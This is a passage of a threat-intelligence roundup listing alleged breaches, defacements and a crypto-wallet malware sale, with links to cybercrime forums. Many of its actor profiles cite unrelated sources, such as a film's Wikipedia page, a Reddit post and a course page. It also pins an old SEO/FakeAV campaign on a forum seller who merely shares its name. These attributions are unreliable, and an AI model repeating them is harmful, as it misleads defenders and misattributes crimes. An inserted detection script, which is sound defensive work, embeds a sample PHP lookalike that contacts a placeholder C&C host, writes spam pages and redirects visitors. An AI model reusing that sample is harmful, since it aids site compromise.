Screenshots: https://d34iuop8pidsy8.cloudfront.net/adeb0ffd-2a83-40be-bf59-949d09e84b2b.png, https://d34iuop8pidsy8.cloudfront.net/dd22c7c3-3760-4d2d-9b76-2cfc36bcc3ab.png
Incident 12: Alleged Data Leak of Taxi Company Egypt
Summary of Breach and Affected Entities:
The threat actor claims to have leaked data of 176,000 users from an Egyptian taxi company, exposing names, phone numbers, emails, and other personal details.
Detailed Threat Actor Profile: stepbro
Identity and Affiliation: stepbro is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [22]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: Data leaks are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums [7].
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for stepbro are not detailed in the provided research [24]. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases [7].
Impact and Broader Context:
The leak of personal details for 176,000 users can lead to various forms of abuse, including targeted phishing, spam, and potential identity theft. This underscores the importance of robust data protection for service providers handling customer information.
Relevant Resources:
Published URL: https://xss.is/threads/141330/
Screenshots: https://d34iuop8pidsy8.cloudfront.net/d7b105b8-ccd7-447e-b71e-88237a4f4162.jpg
Incident 13: Alleged data breach of Mazaya Egypt
Summary of Breach and Affected Entities:
The threat actor claims to have breached the data of Mazaya, a perfume store in Egypt. The compromised data consists of names, addresses, payment details, and more.
Detailed Threat Actor Profile: stepbro
Identity and Affiliation: stepbro is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [22]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: Data breaches are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums [7].
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for stepbro are not detailed in the provided research [24]. Data breaches often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases [7].
Impact and Broader Context:
The breach of customer data, including payment information, from a retail store highlights the risks associated with e-commerce platforms. Such incidents can lead to financial fraud and erode customer trust, emphasizing the need for strong payment card industry (PCI) compliance and data encryption.
Relevant Resources:
Published URL: https://xss.is/threads/141332/
Screenshots: https://d34iuop8pidsy8.cloudfront.net/67e9b363-20b4-48be-be2e-04910c0a4350.png
Incident 14: Liwaa Muhammad targets the website of Arkan Al Omran Factory
Summary of Breach and Affected Entities:
The group claims to have defaced the website of Arkan Al Omran Factory.
Detailed Threat Actor Profile: Liwaa Muhammad
Identity and Affiliation: Liwaa Muhammad is identified as a threat actor group. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [15]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: While specific motivations for Liwaa Muhammad are not detailed, defacement attacks are often carried out by hacktivists seeking to spread a message or demonstrate capabilities [14].
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for Liwaa Muhammad are not detailed in the provided research. Website defacement typically involves exploiting vulnerabilities in web applications, content management systems, or server configurations to alter the visual appearance of a website [7].
Impact and Broader Context:
Website defacement, while often symbolic, can damage an organization’s reputation, disrupt services, and indicate underlying vulnerabilities that could be exploited for more severe attacks.
Relevant Resources:
Published URL: https://t.me/liwaamohammad/476
Screenshots: https://d34iuop8pidsy8.cloudfront.net/8b15ebea-0982-4764-8381-75ce8e42dc01.png
Incident 15: Liwaa Muhammad targets the website of Multi Technical Solutions Establishment
Summary of Breach and Affected Entities:
The group claims to have defaced the website of Multi Technical Solutions Establishment.
Detailed Threat Actor Profile: Liwaa Muhammad
Identity and Affiliation: Liwaa Muhammad is identified as a threat actor group. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [15]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: While specific motivations for Liwaa Muhammad are not detailed, defacement attacks are often carried out by hacktivists seeking to spread a message or demonstrate capabilities [14].
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for Liwaa Muhammad are not detailed in the provided research. Website defacement typically involves exploiting vulnerabilities in web applications, content management systems, or server configurations to alter the visual appearance of a website [7].
Impact and Broader Context:
Website defacement, while often symbolic, can damage an organization’s reputation, disrupt services, and indicate underlying vulnerabilities that could be exploited for more severe attacks.
Relevant Resources:
Published URL: https://t.me/liwaamohammad/474
Screenshots: https://d34iuop8pidsy8.cloudfront.net/5c40a434-0a32-4409-ac00-7b29200967c3.jpg
Incident 16: Alleged data leak of Philippine fresh user records
Summary of Breach and Affected Entities:
The threat actor claims to have leaked a database containing over 500,000 fresh Philippine user records, including emails, phone numbers, usernames, and physical addresses.
Detailed Threat Actor Profile: NotFoundddd
Identity and Affiliation: NotFoundddd is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [27]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: Data leaks are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums [7].
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for NotFoundddd are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases [7].
Impact and Broader Context:
The leak of over 500,000 user records, including personal identifiable information (PII), poses a significant risk for the affected individuals, potentially leading to identity theft, targeted phishing, and other forms of fraud. This highlights the importance of robust data security practices for any entity handling large volumes of user data.
Relevant Resources:
Published URL: https://darkforums.st/Thread-Selling-over-500K-fresh-Philippine-fresh-user-records-for-sale
Screenshots: https://d34iuop8pidsy8.cloudfront.net/88b77c9e-5af1-4490-9b0f-e9062f63a702.png
Incident 17: Alleged data breach of SOM ENERGIA
Summary of Breach and Affected Entities:
The threat actor claims to have leaked a database of 120,000 records from Som Energia, a Spanish renewable energy cooperative. The leak includes personal and banking information such as names, contact details, national IDs, addresses, and IBANs.
Detailed Threat Actor Profile: Nosferatu
Identity and Affiliation: Nosferatu is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [29]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: The primary motivation for Nosferatu appears to be financial gain, as indicated by their involvement in campaigns to generate revenue from FakeAV (Fake Antivirus) redirects [29].
Tactics, Techniques, and Procedures (TTPs):
Nosferatu has been observed leveraging compromised websites, particularly those tied to WebFusion, in SEO campaigns to redirect victims to FakeAV malware [29]. This involves dropping SEO bot scripts (e.g., lndex.php) that generate spam pages and contact a C&C server to obtain redirection information [29].
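A defender-side check suggested by the TTP above, written here as an added example and not code from the report or from Zscaler: it walks a web root for filenames that imitate legitimate entry points (lndex.php standing in for index.php) and for PHP sources that fetch redirection data over HTTP, write spam pages, or redirect visitors. The expected-name list, the confusable map, the cnc.example hostname and the sample files are constructed for the example.

```python
"""Heuristic scan of a web root for lookalike PHP entry points and SEO-bot traits.

Constructed example: only the name lndex.php comes from the report; every other
filename, hostname and threshold here is an assumption made for illustration.
"""
import os
import re
import tempfile
from typing import Dict, List, Optional

# Legitimate entry points that a dropped lookalike would try to blend in with (assumed).
EXPECTED_NAMES = {"index.php", "wp-login.php", "config.php", "admin.php"}

# Visually confusable characters, mapped to the letter they imitate (l -> i, 0 -> o, ...).
CONFUSABLES = str.maketrans({"l": "i", "1": "i", "|": "i", "0": "o", "5": "s", "3": "e"})

# Source-level traits of the behaviour the report describes: contacting a remote
# host for redirection info, generating spam pages on disk, and redirecting visitors.
OUTBOUND_RE = re.compile(r"\b(curl_init|file_get_contents|fsockopen)\s*\(\s*['\"]?https?://", re.I)
SPAM_WRITE_RE = re.compile(r"\b(file_put_contents|mkdir)\s*\(", re.I)
REDIRECT_RE = re.compile(r"header\s*\(\s*['\"]Location:", re.I)

# Constructed sample web root: a benign index.php, a benign include, and a lookalike
# lndex.php exhibiting all three traits. cnc.example is a reserved placeholder host.
SAMPLE_FILES = {
    "index.php": "<?php\nrequire 'vendor/autoload.php';\necho 'home';\n",
    "inc/config.php": "<?php\n$db_host = 'localhost';\n",
    "lndex.php": (
        "<?php\n"
        "$cfg = file_get_contents('http://cnc.example/redir?h=' . $_SERVER['HTTP_HOST']);\n"
        "file_put_contents('seo/' . md5($cfg) . '.html', $cfg);\n"
        "header('Location: ' . trim($cfg));\n"
    ),
}


def normalise(name: str) -> str:
    """Map a filename to its confusable-free form (lndex.php -> index.php)."""
    return name.lower().translate(CONFUSABLES)


def lookalike_of(name: str) -> Optional[str]:
    """Return the legitimate name this filename imitates, or None if it is not a lookalike."""
    if name.lower() in EXPECTED_NAMES:
        return None
    norm = normalise(name)
    return norm if norm in EXPECTED_NAMES else None


def scan_webroot(root: str) -> List[Dict[str, object]]:
    """Walk root; flag a PHP file if its name is a lookalike or it shows >= 2 SEO-bot traits."""
    findings: List[Dict[str, object]] = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            reasons = []
            imitated = lookalike_of(fname)
            if imitated:
                reasons.append(f"lookalike of {imitated}")
            traits = [label for label, rx in (("outbound http fetch", OUTBOUND_RE),
                                              ("writes files", SPAM_WRITE_RE),
                                              ("location redirect", REDIRECT_RE)) if rx.search(src)]
            if imitated or len(traits) >= 2:
                findings.append({"path": os.path.relpath(path, root), "reasons": reasons + traits})
    return sorted(findings, key=lambda f: str(f["path"]))


def build_sample_webroot() -> str:
    """Write the constructed SAMPLE_FILES into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_sample_webroot()):
        print(finding["path"], "->", ", ".join(finding["reasons"]))
```

On a real web root, pair the filename check with a baseline of expected files, since a benign script that both fetches a remote URL and writes files will also reach the trait threshold.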
Impact and Broader Context:
The data breach of a renewable energy cooperative, involving personal and banking information, highlights the vulnerability of critical infrastructure-related organizations to financially motivated attacks. Such breaches can lead to direct financial fraud and broader trust issues within the energy sector. The use of SEO poisoning and FakeAV redirects by actors like Nosferatu demonstrates a common tactic to monetize compromised systems by tricking users into installing malicious software.
Relevant Resources:
Published URL: https://darkforums.st/Thread-Selling-Som-Energia-Database-SPAIN
Screenshots: https://d34iuop8pidsy8.cloudfront.net/f229d86e-1784-426c-8fa6-1d7fa2eeb0ca.png, https://d34iuop8pidsy8.cloudfront.net/d95f6642-57d6-4eff-8f53-ef581c6c76d9.png
Incident 18: Alleged leak of Vehicle Plates Database Chile
Summary of Breach and Affected Entities:
The threat actor claims to have leaked a database containing detailed vehicle registration records from Chile on a cybercrime forum. The dataset, dated July 5, 2025, reportedly includes over 55,000 records and continues to grow. It contains information such as license plates, vehicle specifications, owner names and identification numbers, inspection details, and traffic ticket counts.
Detailed Threat Actor Profile: DelitosPenales
Identity and Affiliation: DelitosPenales is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [7]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: Data leaks are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums [7].
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for DelitosPenales are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases [7].
Impact and Broader Context:
The leak of a national vehicle registration database is a significant privacy concern, potentially enabling various forms of fraud, surveillance, or targeted criminal activities. This highlights the critical importance of securing government and public sector databases that contain extensive personal and sensitive information.
Relevant Resources:
Published URL: https://darkforums.st/Thread-Plates-Chile-Database
Screenshots: https://d34iuop8pidsy8.cloudfront.net/b95fb742-6e19-4f11-b1c0-1e9255e86a96.png, https://d34iuop8pidsy8.cloudfront.net/64aec11a-d501-4855-bbf0-b4c6bec35c90.png
Incident 19: Alleged sale of CAIN Malware
Summary of Breach and Affected Entities:
A threat actor claims to be selling CAIN, a malicious tool described as an evil twin of the Ledger cryptocurrency wallet app. The malware operates in five stealthy phases, including silently replacing the legitimate app with a flawless clone, harvesting mnemonic phrases via a fake recovery prompt, and executing an instant crypto theft. It then restores the original app and self-destructs, leaving no trace.
Detailed Threat Actor Profile: BUBBAS GATE
Identity and Affiliation: BUBBAS GATE is identified as a threat actor, specifically a malware developer or seller. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [33]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: The sale of malware like CAIN is primarily driven by financial gain, enabling other cybercriminals to conduct cryptocurrency theft.
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for BUBBAS GATE are not detailed in the provided research. However, the description of CAIN malware indicates sophisticated techniques for stealth, impersonation, credential harvesting (mnemonic phrases), and self-destruction to evade detection.
Impact and Broader Context:
The development and sale of specialized malware like CAIN, targeting cryptocurrency wallets, represent a direct threat to digital asset holders. This highlights the evolving sophistication of financially motivated cybercrime and the need for users to exercise extreme caution with cryptocurrency applications and prompts.
Relevant Resources:
Published URL: https://xss.is/threads/141327/
Screenshots: https://d34iuop8pidsy8.cloudfront.net/2e2242fb-9993-4941-8083-37e5bb6b7fb7.png, https://d34iuop8pidsy8.cloudfront.net/2e2f8e0f-5dab-4522-aa68-08a6948345f3.png
Incident 20: Alleged data sale of documents from a Federal State Budgetary Institution of Higher Education
Summary of Breach and Affected Entities:
The threat actor claims to be selling classified documents from the Federal State Budgetary Institution of Higher Education. The leak includes sensitive agreements and licenses related to Gazprom, Gazpromneft, INK, geological and geophysical exploration, oil and gas suppliers, and tax and legal documents dated from 2012 to 2021.
Detailed Threat Actor Profile: deabec
Identity and Affiliation: deabec is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [35]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: The sale of classified documents is primarily driven by financial gain, as such information can be highly valuable on illicit markets.
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for deabec are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to institutional networks [7].
Impact and Broader Context:
The alleged sale of classified documents from a higher education institution, especially those related to major energy companies and government entities, poses a significant risk of corporate espionage, intellectual property theft, and national security implications. This highlights the critical need for robust cybersecurity in academic and research institutions, particularly those with ties to sensitive industries.
Relevant Resources:
Published URL: https://darkforums.st/Thread-Selling-classified-documents-from-Federal-State-Budgetary-Institution-of-Higher-Education
Screenshots: https://d34iuop8pidsy8.cloudfront.net/9051adce-6c66-4a5e-a5c6-3228911882da.png, https://d34iuop8pidsy8.cloudfront.net/7a9cc4b5-142b-4e8d-a859-38ba008fbbd8.png
Incident 21: Alleged data breach of Fashion Group México and GOC Makeup
Summary of Breach and Affected Entities:
The threat actor claims to have leaked a database containing 135,535 records from Fashion Group México and GOC Makeup. The data includes full names, email addresses, phone numbers, CURP, RFC, dates of birth, addresses, credit limits, loyalty program data, bank account fields, and more.
Detailed Threat Actor Profile: Rui_Deidad
Identity and Affiliation: Rui_Deidad is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [36]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: Data breaches are typically driven by financial incentives, aiming to sell sensitive information on cybercrime forums [7].
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for Rui_Deidad are not detailed in the provided research. Data breaches often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases [7].
Impact and Broader Context:
The breach of 135,535 records containing extensive personal and financial information from retail and makeup companies poses a significant risk of identity theft, financial fraud, and targeted marketing scams for the affected individuals. This underscores the importance of robust data security for consumer-facing businesses.
Relevant Resources:
Published URL: https://darkforums.st/Thread-FASHION-GROUP-MEXICO-135-535-RECORDS-LEAK
Screenshots: https://d34iuop8pidsy8.cloudfront.net/dc0ff990-8f64-4d2d-be44-17f081a874f9.png
Incident 22: Alleged leak of data from a Seychelle main bank
Summary of Breach and Affected Entities:
The threat actor claims to have leaked a database containing client information from a major bank in Seychelles. The data allegedly includes names, dates of birth, phone numbers, addresses, and emails. While employee PINs and passwords are present, they are said to be encrypted with advanced security layers, making decryption currently impossible despite access to the AES key. The leak reportedly includes sensitive entries such as government balance accounts.
Detailed Threat Actor Profile: ByteToBreach
Identity and Affiliation: ByteToBreach is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [37]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: Data leaks from financial institutions are primarily driven by financial gain, as banking information is highly valuable on illicit markets [7].
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for ByteToBreach are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases [7].
Impact and Broader Context:
A data leak from a major bank, even with encrypted passwords, poses a severe risk to client privacy and financial security. The presence of sensitive entries like government balance accounts suggests potential broader implications beyond individual clients, highlighting the critical need for robust cybersecurity in the banking sector.
Relevant Resources:
Published URL: https://darkforums.st/Thread-SELL-Seychelle-main-bank-clients-leak
Screenshots: https://d34iuop8pidsy8.cloudfront.net/2b754fd3-b4b7-4427-bfc2-f610b32597cf.png
Incident 23: Alleged data sale from an unidentified financial services firm in Panama
Summary of Breach and Affected Entities:
The threat actor claims to be selling a database allegedly sourced from an unidentified Panamanian financial services organization, containing 60,000 entries. The data includes full names, national IDs (cedula), email addresses, monthly salaries, regions, genders, and document verification flags.
Detailed Threat Actor Profile: Lucczi
Identity and Affiliation: Lucczi is identified as a threat actor. Specific details regarding their history, motivations, or detailed TTPs are limited in the provided research material [39]. Threat actors are generally defined as individuals or groups who intentionally cause harm in the digital sphere by exploiting weaknesses in systems or networks [7].
Motivations: The sale of financial data is primarily driven by financial gain, as such information can be highly valuable for fraud and other illicit activities [7].
Tactics, Techniques, and Procedures (TTPs):
Specific TTPs for Lucczi are not detailed in the provided research. Data leaks often result from exploiting vulnerabilities, phishing, or leveraging compromised credentials to gain unauthorized access to databases [7].
Impact and Broader Context:
The alleged sale of 60,000 financial records from a Panamanian firm, including sensitive details like national IDs and salaries, poses a significant risk of identity theft and financial fraud for the affected individuals. This underscores the importance of robust data protection in the financial services sector, particularly in regions that may be targeted for such data.
Relevant Resources:
Published URL: https://darkforums.st/Thread-%F0%9F%87%B5%F0%9F%87%A6-Panama-Fullz-Salary-Emails-%E2%80%94-60K-Fresh-Leads
Screenshots: https://d34iuop8pidsy8.cloudfront.net/b4239026-df01-401c-818c-5a75106f90fc.png
Conclusions
The analysis of recent cybersecurity incidents reveals several critical dynamics shaping the current threat landscape. The interconnectedness of geopolitical conflicts and cyber operations is undeniable, with state-sponsored entities and their proxies actively using the digital realm as an extension of real-world tensions. This means that geopolitical developments must be closely monitored as a key indicator for potential cyber threats, particularly for organizations operating in or having ties to conflict regions.
Furthermore, the varying nature of hacktivism demands a nuanced approach to threat assessment
Works cited
1. Reflections of the Israel-Iran Conflict on the Cyber World …, accessed July 6, 2025, https://socradar.io/reflections-of-israel-iran-conflict-cyber-world/
2. U.S. Agencies Warn of Rising Iranian Cyber Attacks on Defense, OT …, accessed July 6, 2025, https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html
3. Using AI to identify cybercrime masterminds – Sophos News, accessed July 6, 2025, https://news.sophos.com/en-us/2025/06/30/using-ai-to-identify-cybercrime-masterminds/
4. XMAX – Krebs on Security, accessed July 6, 2025, https://krebsonsecurity.com/tag/xmax/
5. XIM4 for console? : r/Overwatch – Reddit, accessed July 6, 2025, https://www.reddit.com/r/Overwatch/comments/4xzdr9/xim4_for_console/
6. accessed January 1, 1970, https://forum.exploit.in/topic/261980/?tab=comments#comment-1579683
7. What is a Cyber Threat Actor? | CrowdStrike, accessed July 6, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
8. Disrupting Handala: Did OP Innovate Help Silence a Major Cyber …, accessed July 6, 2025, https://op-c.net/blog/did-op-innovate-disrupt-handala-cyber-threat/
9. Handala (Threat Actor) – Malpedia, accessed July 6, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/handala
10. Brief Disruptions, Bold Claims: The Tactical Reality Behind the India …, accessed July 6, 2025, https://www.cloudsek.com/blog/brief-disruptions-bold-claims-the-tactical-reality-behind-the-india-pakistan-hacktivist-surge
11. Hacktivist Attacks on India Overstated Amid APT36 Espionage …, accessed July 6, 2025, https://www.infosecurity-magazine.com/news/hacktivist-attacks-india/
12. Rare Werewolf APT Uses Legitimate Software in Attacks on Hundreds of Russian Enterprises – The Hacker News, accessed July 6, 2025, https://thehackernews.com/2025/06/rare-werewolf-apt-uses-legitimate.html
13. Experts urge vigilance as lone wolf terror threats rise nationwide, citing recent attacks, accessed July 6, 2025, https://www.youtube.com/watch?v=ObeukBBWKEs
14. Threat actor – Wikipedia, accessed July 6, 2025, https://en.wikipedia.org/wiki/Threat_actor
15. FBI Identifies Lazarus Group Cyber Actors as Responsible for Theft of $41 Million from Stake.com, accessed July 6, 2025, https://www.fbi.gov/news/press-releases/fbi-identifies-lazarus-group-cyber-actors-as-responsible-for-theft-of-41-million-from-stakecom
16. FBI Confirms Lazarus Group Cyber Actors Responsible for Harmony’s Horizon Bridge Currency Theft, accessed July 6, 2025, https://www.fbi.gov/news/press-releases/fbi-confirms-lazarus-group-cyber-actors-responsible-for-harmonys-horizon-bridge-currency-theft
17. accessed January 1, 1970, https://t.me/liwaamohammad/474
18. accessed January 1, 1970, https://t.me/liwaamohammad/476
19. accessed January 1, 1970, https://t.me/liwaamohammad/477
20. Attack Surface Analysis of the Digital Twin and Advanced Sensor and Instrumentation Interfaces – INL Digital Library – Idaho National Laboratory, accessed July 6, 2025, https://inldigitallibrary.inl.gov/sites/sti/sti/Sort_74726.pdf
21. #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed July 6, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
22. Chakra (2021 film) – Wikipedia, accessed July 6, 2025, https://en.wikipedia.org/wiki/Chakra_(2021_film)
23. HAPPY FAMILIES – Macmillan.pl, accessed July 6, 2025, https://www.macmillan.pl/images/materials/1667556484_Gateway_to_the_World_B1_WB_U1-2.pdf
24. accessed January 1, 1970, https://xss.is/threads/141332/
25. accessed January 1, 1970, https://xss.is/threads/141330/
26. accessed January 1, 1970, https://xss.is/threads/141331/
27. Got hacked and they added an additional profile that I can’t delete and cant see it on my account center either. Any suggestions thats not deleting the account, unless theres no other way I will. : r/facebook – Reddit, accessed July 6, 2025, https://www.reddit.com/r/facebook/comments/1chtcl8/got_hacked_and_they_added_an_additional_profile/
28. accessed January 1, 1970, https://darkforums.st/Thread-Selling-over-500K-fresh-Philippine-fresh-user-records-for-sale
29. WebFusion “nosferatu” SEO/FakeAV Campaign – Zscaler, accessed July 6, 2025, https://www.zscaler.com/blogs/security-research/webfusion-nosferatu-seofakeav-campaign
30. The Nosferatu : r/WhiteWolfRPG – Reddit, accessed July 6, 2025, https://www.reddit.com/r/WhiteWolfRPG/comments/nxfdzu/the_nosferatu/
31. accessed January 1, 1970, https://darkforums.st/Thread-Selling-Som-Energia-Database-SPAIN
32. accessed January 1, 1970, https://darkforums.st/Thread-Plates-Chile-Database
33. Cloaked and Covert: Uncovering UNC3886 Espionage Operations | Google Cloud Blog, accessed July 6, 2025, https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
34. accessed January 1, 1970, https://xss.is/threads/141327/
35. accessed January 1, 1970, https://darkforums.st/Thread-Selling-classified-documents-from-Federal-State-Budgetary-Institution-of-Higher-Education
36. accessed January 1, 1970, https://darkforums.st/Thread-FASHION-GROUP-MEXICO-135-535-RECORDS-LEAK
37. Threat actor | Malwarebytes Glossary, accessed July 6, 2025, https://www.malwarebytes.com/glossary/threat-actor
38. accessed January 1, 1970, https://darkforums.st/Thread-SELL-Seychelle-main-bank-clients-leak
39. Minor in Computer Crime and Forensics – Loyola University Chicago, accessed July 6, 2025, https://www.luc.edu/forensicscience/minor.shtml
40. accessed January 1, 1970, https://darkforums.st/Thread-%F0%9F%87%B5%F0%9F%87%A6-Panama-Fullz-Salary-Emails-%E2%80%94-60K-Fresh-Leads